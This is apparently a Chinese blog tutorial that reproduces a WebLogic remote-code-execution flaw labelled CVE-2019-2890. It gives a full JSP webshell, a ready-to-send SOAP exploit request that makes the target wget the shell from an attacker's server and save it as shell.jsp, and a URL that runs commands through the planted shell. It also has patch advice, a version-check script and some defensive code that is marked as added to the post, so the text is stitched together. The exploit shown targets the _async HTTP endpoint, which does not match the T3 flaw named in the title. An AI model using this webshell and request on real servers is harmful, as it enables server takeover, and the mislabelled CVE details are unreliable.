WebLogic deserialization vulnerability (CVE-2019-2890) reproduction (super detailed)

Table of Contents

1. Vulnerability introduction

2. Scope of influence

3. Vulnerability environment construction

4. Vulnerability reproduction

5. Vulnerability fixes

6. Vulnerability detection poc


   Many vulnerability reproduction articles are not detailed enough: if you follow what the author wrote, you run into many, many problems. I combined several articles and wrote down the most detailed reproduction steps. I hope this helps everyone avoid detours.

1. Vulnerability introduction

       On October 15, 2019, Oracle officially released its October 2019 security update bulletin, which includes a high-risk vulnerability that can lead to remote code execution (RCE). The vulnerability number is CVE-2019-2890.

       When WebLogic loads remote resources over the T3 protocol, it applies a blacklist filter by default to keep deserialization safe. This vulnerability bypasses WebLogic's deserialization blacklist, allowing an attacker to remotely attack vulnerable WebLogic components over the T3 protocol. Because the T3 service is enabled by default whenever the WebLogic console is enabled, and a default WebLogic installation enables the console automatically, an attacker can use this vulnerability to achieve remote code execution and take control of the WebLogic server.

2. Scope of influence

  • WebLogic Server 10.3.6.0
  • WebLogic Server 12.1.3.0
  • WebLogic Server 12.2.1.3

3. Vulnerability environment construction

Test environment version: WebLogic 10.3.6.0

Use the CVE-2017-10271 environment from vulhub directly: enter its directory and run docker-compose up -d

Visit port 7001/console (for example http://192.168.1.5:7001/console); if the console page loads, the environment has been set up successfully

4. Vulnerability reproduction

Check whether the target is vulnerable: if the URL below responds as shown in the figure, the target may be vulnerable

http://192.168.1.5:7001/_async/AsyncResponseService

1. Create the shell.txt file and start a web service

       Here I create a shell.txt file on a remote VPS with the following content, and start a web service with Python in the directory containing the file, using the command: python3 -m http.server 11111

shell.txt

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[1024];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

Visit the web service to confirm that it is up and serving the file

2. Visit http://192.168.1.5:7001/_async/AsyncResponseService and intercept the request

Replace the intercepted request with the following one

POST /_async/AsyncResponseService HTTP/1.1
Host: you ip:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Length: 858
content-type: text/xml

<soapenv:Envelope 
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://web服务ip:端口/shell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

As shown below, if response data is returned, the request succeeded and the webshell (Trojan) file has been written to the server
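From the defender's side, the request above is recognisable on the wire: a legitimate _async call never carries java.beans.XMLDecoder elements (void, array, object) inside its WorkContext header. The following detection routine is an added example, not code from the original post; the two SOAP samples are constructed (the "gadget" one mirrors the header structure shown above with a harmless placeholder command).

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"
# Element names from the java.beans.XMLDecoder vocabulary: a WorkContext
# header carrying these is an XMLDecoder gadget, not a legitimate work context.
XMLDECODER_TAGS = {"void", "array", "object"}

def find_workcontext_gadgets(body: str) -> list:
    """Return a description of every XMLDecoder-style element found inside a
    WorkContext SOAP header, in document order; [] means nothing suspicious."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []          # not XML at all: let other rules handle it
    header = root.find(f"{{{SOAP_NS}}}Header")
    if header is None:
        return []
    hits = []
    for ctx in header.iter(f"{{{WORK_NS}}}WorkContext"):
        for el in ctx.iter():
            tag = el.tag.split("}")[-1]          # drop any namespace prefix
            if tag in XMLDECODER_TAGS:
                cls = el.get("class")
                hits.append(f"{tag} class={cls}" if cls else tag)
    return hits

# Constructed sample request with the same header structure as the packet
# above (the command "id" is an assumed harmless placeholder).
SAMPLE_GADGET = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1">
<void index="0"><string>id</string></void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>"""

# Constructed benign request: no WorkContext header at all.
SAMPLE_BENIGN = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/><soapenv:Body/></soapenv:Envelope>"""

if __name__ == "__main__":
    print(find_workcontext_gadgets(SAMPLE_GADGET))   # four XMLDecoder elements
    print(find_workcontext_gadgets(SAMPLE_BENIGN))   # []
```

The check only looks inside the SOAP header, so run it on the raw POST body before the server parses it (for example in a WAF or a request-logging proxy).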

3. Access the shell

http://192.168.1.5:7001/_async/shell.jsp?pwd=123&cmd=whoami

5. Vulnerability fixes

1. Update Oracle October 2019 Patch

      https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html

2. Control the access of T3 protocol

      This vulnerability is in WebLogic's T3 service, so attacks against it can be blocked temporarily by restricting access to the T3 protocol. When the WebLogic console port (7001 by default) is open, the T3 service is enabled by default. Steps:

(1) Enter the WebLogic console; on the configuration page of base_domain, open the "Security" tab and click "Filter" to open the connection filter configuration.

(2) In the connection filter field enter: weblogic.security.net.ConnectionFilterImpl; in the connection filter rules field enter: 127.0.0.1 * * allow t3 t3s, 0.0.0.0/0 * * deny t3 t3s (all ports of the t3 and t3s protocols only allow local access).

(3) After saving, restart the server for the rules to take effect.
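To see what the two rules in step (2) actually permit, here is a small model of the rule syntax (target, local address, local port, action, protocols). It is an added example, not WebLogic code; it assumes rules are evaluated in order with the first match deciding and that an unmatched connection is accepted, which is how ConnectionFilterImpl is documented but is treated here as an assumption.

```python
import ipaddress

# Rule syntax as used above: <target> <localAddress> <localPort> <action> <protocols...>
def parse_rule(line):
    target, local_addr, local_port, action, *protocols = line.split()
    return target, local_addr, local_port, action, set(protocols)

def _target_matches(target, remote_ip):
    # "*" matches everyone; otherwise target is a host or a CIDR such as 0.0.0.0/0
    if target == "*":
        return True
    try:
        return ipaddress.ip_address(remote_ip) in ipaddress.ip_network(target, strict=False)
    except ValueError:
        return False

def is_allowed(rules, remote_ip, protocol, local_addr="*", local_port=7001):
    """Evaluate the rules in order; the first matching rule decides, and a
    connection matched by no rule is accepted (assumed ConnectionFilterImpl
    semantics, see the lead-in)."""
    for target, laddr, lport, action, protos in rules:
        if not _target_matches(target, remote_ip):
            continue
        if laddr != "*" and laddr != local_addr:
            continue
        if lport != "*" and int(lport) != local_port:
            continue
        if protos and protocol not in protos:   # empty protocol list = all protocols
            continue
        return action == "allow"
    return True

# The two rules from step (2) above
RULES = [parse_rule("127.0.0.1 * * allow t3 t3s"),
         parse_rule("0.0.0.0/0 * * deny t3 t3s")]

if __name__ == "__main__":
    for ip, proto in [("127.0.0.1", "t3"), ("192.168.1.5", "t3"), ("192.168.1.5", "http")]:
        print(ip, proto, "allowed" if is_allowed(RULES, ip, proto) else "denied")
```

Note the third case: HTTP from a remote host is still allowed, because the filter only covers t3 and t3s, and the request to /_async/AsyncResponseService used in the reproduction above is plain HTTP on port 7001. Restricting T3 is a stop-gap; the patch from step 1 is the actual fix.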
 

6. Vulnerability detection poc

#author:xcc
import re
import sys
import argparse
import requests

headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36'
}

def get_target():
    # Parse the target URL from the command line and require an explicit scheme
    parser = argparse.ArgumentParser(description=' WebLogic 反序列化漏洞(CVE-2019-2890)POC')
    parser.add_argument('target_url', type=str, help='The target address, example: http://192.168.140.153:7001')
    args = parser.parse_args()
    target = args.target_url.rstrip('/')
    print('[+]author:xcc')
    print('[-]WebLogic 反序列化漏洞(CVE-2019-2890)检测')
    print(f'[-]目标:{target}')
    print('[-]正在请求目标地址...')
    if not (target.startswith('http://') or target.startswith('https://')):
        print('[-]Please include http:// or https:// in the URL!!')
        sys.exit(0)   # the original called os._exit(0) without importing os
    return target

def poc(target):
    # Read the WebLogic version from the console footer, then check whether the
    # /_async/AsyncResponseService endpoint is exposed on an affected version
    try:
        console_text = requests.get(url=target + '/console', headers=headers, timeout=10).text
        ex = '<p id="footerVersion">WebLogic Server .*: (.*?)</p>'
        result = re.findall(ex, console_text, re.S)
        version = result[0].strip() if result else None   # avoid IndexError when no footer
        r = requests.get(url=target + '/_async/AsyncResponseService', headers=headers, timeout=10)
        version_list = ['12.2.1.3', '12.1.3.0', '10.3.6.0']
        if r.status_code == 200 and "Welcome to the" in r.text and version in version_list:
            print('[+]漏洞存在')
        else:
            print('[-]漏洞不存在')
    except Exception as error:
        print('发生错误:', error)

if __name__ == '__main__':
    poc(get_target())


Origin blog.csdn.net/qq_44159028/article/details/114868924